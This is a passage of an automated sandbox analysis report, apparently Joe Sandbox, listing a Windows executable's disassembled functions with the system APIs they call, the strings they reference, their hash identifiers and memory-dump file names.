                          • Opcode Fuzzy Hash: 2556b9e1b7bf7b5d15956e0f6937d6efc19780a902f330f6759539d63a3f52f1
                          • Instruction Fuzzy Hash: 1D625371D01A98AADF04EFA1DC55FEEB7B8BF26300F44015AF415B3182EB749A49CB94
                          APIs
                          • _wcslen.LIBCMT ref: 001F2CCE
                          • _wcslen.LIBCMT ref: 001F2ECF
                          • GetProcAddress.KERNEL32(?,SHGetSpecialFolderLocation), ref: 001F30CF
                          • GetProcAddress.KERNEL32(?,SHGetPathFromIDListW), ref: 001F30DD
                          • GetProcAddress.KERNEL32(?,CoTaskMemFree), ref: 001F30EC
                          • _wcslen.LIBCMT ref: 001F3185
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AddressProc_wcslen
                          • String ID: CoTaskMemFree$Ole32.dll$SHGetPathFromIDListW$SHGetSpecialFolderLocation$Shell32.dll
                          • API String ID: 3980679079-3379794795
                          • Opcode ID: d416e1ef85357da0a656a45fd4d353832283179251ba1c68a5d6d492b005ba6e
                          • Instruction ID: d6a1936a7ee96aa0070734340267ecb3f0358b071eb52138ddbc8dca30fe31bd
                          • Opcode Fuzzy Hash: d416e1ef85357da0a656a45fd4d353832283179251ba1c68a5d6d492b005ba6e
                          • Instruction Fuzzy Hash: 0A02D071D102189BCB249B34CC857AEB3F5BF85310F2582A9E569D7294EF319E81CF91
                          APIs
                          • FindSITargetTypeInstance.LIBVCRUNTIME ref: 0022DB97
                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 0022DBB0
                          • FindVITargetTypeInstance.LIBVCRUNTIME ref: 0022DBB7
                          • PMDtoOffset.LIBCMT ref: 0022DBD6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FindInstanceTargetType$Offset
                          • String ID: Bad dynamic_cast!
                          • API String ID: 1467055271-2956939130
                          • Opcode ID: 0c51a18a18dbb70df05f88c14f2b903cacb0408c2fce6dc9d63d11c07219d365
                          • Instruction ID: e0dd5f9607382e599d92e5e4232f3e21a8b316b9fdd180e87e454c15f1aa0860
                          • Opcode Fuzzy Hash: 0c51a18a18dbb70df05f88c14f2b903cacb0408c2fce6dc9d63d11c07219d365
                          • Instruction Fuzzy Hash: 54411032920635AFCB05DEADF8446AAB3A1FF85365F124716ED4453190D735EC34D790
                          APIs
                          • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,1FE05385,?,?), ref: 001F3FA2
                          • _wcslen.LIBCMT ref: 001F3FC2
                          • _wcslen.LIBCMT ref: 001F4129
                          • LocalFree.KERNEL32(?), ref: 001F425D
                          • GetLastError.KERNEL32(1FE05385), ref: 001F43A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$ErrorFormatFreeLastLocalMessage
                          • String ID: Unknown error
                          • API String ID: 3724733814-83687255
                          • Opcode ID: 68649d3cedb82845b36aa81eb2753bf78139a15a0edd98c454b89ec91e82d79a
                          • Instruction ID: 36778a85f31345253e28a487fe5c8df4ef2c8f3c2346793d3bd92a4057b9eb0c
                          • Opcode Fuzzy Hash: 68649d3cedb82845b36aa81eb2753bf78139a15a0edd98c454b89ec91e82d79a
                          • Instruction Fuzzy Hash: C8D1E271E102199BDB14CF64D885BBFB7F5BF44324F25022EE926E7290EB70A9448B91
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: 80985bba647da21fc695cea2f64da9371d202f8625ba229bd4e18e123cf834d3
                          • Instruction ID: d67ae84a46fefba90af6fc41c1bddb2c69954ca56a95eb8385b6c36c1514e181
                          • Opcode Fuzzy Hash: 80985bba647da21fc695cea2f64da9371d202f8625ba229bd4e18e123cf834d3
                          • Instruction Fuzzy Hash: 0BC27D71E296399FDB25CE68ED407EAB7B5EB44304F1441EAD80DE7240E774AEA18F40
                          APIs
                          • EnterCriticalSection.KERNEL32(00000000,1FE05385,00000000,00000000,?), ref: 001F690E
                          • LeaveCriticalSection.KERNEL32(?,1FE05385,00000000,00000000,?), ref: 001F69C7
                          • LoadLibraryW.KERNEL32(001F2E3D,1FE05385,00000000,00000000,?), ref: 001F6B0B
                          • EnterCriticalSection.KERNEL32(00000000), ref: 001F6B35
                          • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 001F6B89
                          • LeaveCriticalSection.KERNEL32(00000000), ref: 001F6BF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter$LibraryLoad
                          • String ID:
                          • API String ID: 1982346941-0
                          • Opcode ID: fd7a170e5c929094777ecfde1980b9f991b975328d17a25cfd68b3efabeb659b
                          • Instruction ID: 11e9831e0656e34fa1ae477e54a6651de0ac0f84e60aa874eaf8d85e1e6a622e
                          • Opcode Fuzzy Hash: fd7a170e5c929094777ecfde1980b9f991b975328d17a25cfd68b3efabeb659b
                          • Instruction Fuzzy Hash: 79E19D71A00209DFDB18CF68D994BAEB7B5FF49314F24462DE516EB790D735AA00CB90
                          APIs
                          • SetFilePointer.KERNEL32(?,00000000,?,00000001,1FE05385), ref: 001F3DAC
                          • GetLastError.KERNEL32 ref: 001F3DBC
                          • SetEndOfFile.KERNEL32(?,?,?,00000000,?), ref: 001F3E3B
                            • Part of subcall function 001FA0B0: SetFilePointer.KERNELBASE(?,?,?,?,?,001FA024,00000000,00000000,00000001,?), ref: 001FA0E5
                            • Part of subcall function 001FA0B0: GetLastError.KERNEL32(?,?,?,?,?,001FA024,00000000,00000000,00000001,?), ref: 001FA0F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: File$ErrorLastPointer
                          • String ID:
                          • API String ID: 841452515-0
                          • Opcode ID: cbeb648d3def6d75fbe0b1c6c7303b8c0b0591085b88d0b7db7a8887c09eb8af
                          • Instruction ID: 6375a16086c47b02dd3041c85827093167c58192b109ab4d596e41d7b636d3a3
                          • Opcode Fuzzy Hash: cbeb648d3def6d75fbe0b1c6c7303b8c0b0591085b88d0b7db7a8887c09eb8af
                          • Instruction Fuzzy Hash: 3C517171E0020DABDF14CFB9D844BBEBBB8AF19320F158219FA25B7281D73459408BA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                          • API String ID: 0-1714976780
                          • Opcode ID: c77623a033a8abfacda9f66ad4af76de5be2dd884c722bfa4f30fc1e450f6a10
                          • Instruction ID: dd2aa8822a0f9bf135ac6b9987c159b3c6af127a6db40c2cfd4705f5ab5005b9
                          • Opcode Fuzzy Hash: c77623a033a8abfacda9f66ad4af76de5be2dd884c722bfa4f30fc1e450f6a10
                          • Instruction Fuzzy Hash: FB314C77E149961BFB396879D8947BD7083A390730F2AC739D936D35C5EA788C804190
                          APIs
                          • _wcslen.LIBCMT ref: 001E27E6
                          • CoCreateInstance.OLE32(00230350,00000000,00000001,00230330,?,?,?,0000005C), ref: 001E28E9
                          • CoCreateInstance.OLE32(00230350,00000000,00000001,00230330,?,?,00000000,000000FF), ref: 001E2A76
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CreateInstance$_wcslen
                          • String ID: .lnk
                          • API String ID: 2916380183-24824748
                          • Opcode ID: e35522ef55c757ab1653de505a45d3b8d139722e18df827c6d79cbda4e86931f
                          • Instruction ID: 7798a6e78e05a299122a101292676fbd3853d826067acb1a9c2f360e498f4ab6
                          • Opcode Fuzzy Hash: e35522ef55c757ab1653de505a45d3b8d139722e18df827c6d79cbda4e86931f
                          • Instruction Fuzzy Hash: 4CE16A70A006989FCF24DFA5C8A4BEEB7B9BF55304F144098E44AAB291DB70AD85CF51
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0021F092
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0021F09C
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0021F0A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID: {*"
                          • API String ID: 3906539128-502190959
                          • Opcode ID: 74768fcc48a3db8db698c12dfe05bfa4ee5da6c8a58399890f73f03aa06a64e6
                          • Instruction ID: efd986d94285e0a8a11a91733162961b67012a88b3d805b5d1080365ae930acb
                          • Opcode Fuzzy Hash: 74768fcc48a3db8db698c12dfe05bfa4ee5da6c8a58399890f73f03aa06a64e6
                          • Instruction Fuzzy Hash: 5D31C2B5911219ABCB61DF24DD887C8BBF8AF18310F5042EAE81CA7251E7709B958F44
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID:
                          • API String ID: 176396367-0
                          • Opcode ID: eed13e45a594d5c49ab8e1816e80ed70787b4a65bcc6ca11dedf05f1dc5d046e
                          • Instruction ID: 97793ac632d56c4c8c796852dca68bb9e16dd0e9f081e605640573b95c0f9ccf
                          • Opcode Fuzzy Hash: eed13e45a594d5c49ab8e1816e80ed70787b4a65bcc6ca11dedf05f1dc5d046e
                          • Instruction Fuzzy Hash: 14021671910A818BC718DF35CC8566E72E5BF85360F21072DF82AC72E1E730E9568BD2
                          APIs
                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 0022DC0A
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0022DC31
                            • Part of subcall function 0021D84D: RaiseException.KERNEL32(?,?,?,0021B9D7,?,?,?,?,?,?,?,?,0021B9D7,?,00244410), ref: 0021D8AD
                          Strings
                          • Access violation - no RTTI data!, xrefs: 0022DC01
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                          • String ID: Access violation - no RTTI data!
                          • API String ID: 2053020834-2158758863
                          • Opcode ID: 261a0353099895fe17dc0a4b2b6ece9b320d3d1260e534d9bc3bba429e156e59
                          • Instruction ID: 477c0b9c4c0b09f65a4effc58010028a826fdceef3a609c95678b1eb2ad652a3
                          • Opcode Fuzzy Hash: 261a0353099895fe17dc0a4b2b6ece9b320d3d1260e534d9bc3bba429e156e59
                          • Instruction Fuzzy Hash: F021A872C206359BCB02DEADE4845A6F3E5FB84325F674617ED4463190C678FC24D6A0
                          APIs
                            • Part of subcall function 001EBD60: __aulldiv.LIBCMT ref: 001EBD78
                          • _wcslen.LIBCMT ref: 001F90D7
                          • _wcslen.LIBCMT ref: 001F9281
                          • _wcslen.LIBCMT ref: 001F942B
                            • Part of subcall function 0021B1A7: __CxxThrowException@8.LIBVCRUNTIME ref: 0021B9B5
                            • Part of subcall function 0021B1A7: __CxxThrowException@8.LIBVCRUNTIME ref: 0021B9D2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$Exception@8Throw$__aulldiv
                          • String ID:
                          • API String ID: 3170199240-0
                          • Opcode ID: b09e67eed916475607d297aa06254a032806e896fe96c0ddc065402eab954389
                          • Instruction ID: ced2735a75060193a0ed0d0c695640d5618cc0589641856ed981e2386d396fd1
                          • Opcode Fuzzy Hash: b09e67eed916475607d297aa06254a032806e896fe96c0ddc065402eab954389
                          • Instruction Fuzzy Hash: FD32F2B1A143099FC718EF24D881A7EB7E9BF98350F10062DF556C73A1E730EA558B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID: /
                          • API String ID: 0-2043925204
                          • Opcode ID: 056b32001f749bc350fe4da17da23db39d352ec575602420c429ffd7bd3f3c00
                          • Instruction ID: f904837d0cf2c52fbad7d4062edf04f585a087e7cd6a89562b876e430d33ec05
                          • Opcode Fuzzy Hash: 056b32001f749bc350fe4da17da23db39d352ec575602420c429ffd7bd3f3c00
                          • Instruction Fuzzy Hash: 45413B725106297FCB20AFF8EC4CDAB77B8EB84314F504268F905D7180E6719E918B50
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,002207B2), ref: 0022454A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID: GetSystemTimePreciseAsFileTime
                          • API String ID: 2086374402-595813830
                          • Opcode ID: 1df99c97447ca165130a84eaec7c33e25a5f3b581d3511a0e312de5d9dee740e
                          • Instruction ID: df1eab88f0cac97416a3dae8ac1cf0c5d9b0853f01b9782af4e3617ef5870371
                          • Opcode Fuzzy Hash: 1df99c97447ca165130a84eaec7c33e25a5f3b581d3511a0e312de5d9dee740e
                          • Instruction Fuzzy Hash: E4E055B0AA1228BBC3107F50BD0AA3EBBA0DF12B00B400019FC081B241DA710D30AAE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2fedcd2c9e242333e109232573e393d1caf5baa05ce4a0087343e35a6a351a6f
                          • Instruction ID: 6482824a6eb3496bfb32d1333bf6f4eb173c5632a23854241b4f03380f285a74
                          • Opcode Fuzzy Hash: 2fedcd2c9e242333e109232573e393d1caf5baa05ce4a0087343e35a6a351a6f
                          • Instruction Fuzzy Hash: E2024E72E14229AFDF14CFA9D9806AEB7F1FF48314F254169E819E7340D731AA55CB80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID: ^l
                          • API String ID: 0-1799741131
                          • Opcode ID: 70e949b9626f0c5265fd3d84532bdd1148b7066b87ca60aa66b15755ad5ade63
                          • Instruction ID: 7fa8bfd1d5541d1e0428ea381693af0cdd66b7a139e65af5f44d3f692abf58ab
                          • Opcode Fuzzy Hash: 70e949b9626f0c5265fd3d84532bdd1148b7066b87ca60aa66b15755ad5ade63
                          • Instruction Fuzzy Hash: D092F971F102188FDB98CFADDC9169DB7F2AF88304F548429E41AE7345EB34A8968B45
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
